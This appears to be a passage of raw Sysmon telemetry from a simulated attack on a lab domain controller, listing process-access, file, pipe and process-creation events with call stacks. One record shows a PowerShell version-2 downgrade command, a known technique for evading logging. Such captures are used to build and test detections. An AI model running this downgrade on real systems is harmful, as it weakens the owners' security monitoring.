10341000x80000000000000001697444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.874{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.874{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:40.849{05ADC7E1-70EC-603D-7188-00000000AD01}7448\PSHost.132591129407674705.7448.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.849{05ADC7E1-70EC-603D-7188-00000000AD01}7448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ema1u3qx.xyz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.833{05ADC7E1-70EC-603D-7188-00000000AD01}7448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qc1rsdf5.4fz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.818{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qc1rsdf5.4fz.ps12021-03-01 22:55:40.818 10341000x80000000000000001697438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.802{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.774{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.767{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {powershell.exe -version 2 -Command Write-Host $PSVersion} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.755{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.724{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BF43FD2203D619F496E351F3726D218,SHA256=B3D5507D3FDB9728E54BA6EA3845FD4ADA182FF51CEE7DBAE7F35B7C6B0FE000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.724{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=13015015DD907D28996153DF14881252,SHA256=4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.693{05ADC7E1-70EC-603D-6F88-00000000AD01}7060ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.674{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\art-marker.txt2021-03-01 22:55:40.674 10341000x80000000000000001697422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70EC-603D-7088-00000000AD01}8628C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70EC-603D-7088-00000000AD01}8628C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.552{05ADC7E1-70EC-603D-6F88-00000000AD01}70609180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-7088-00000000AD01}8628C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(w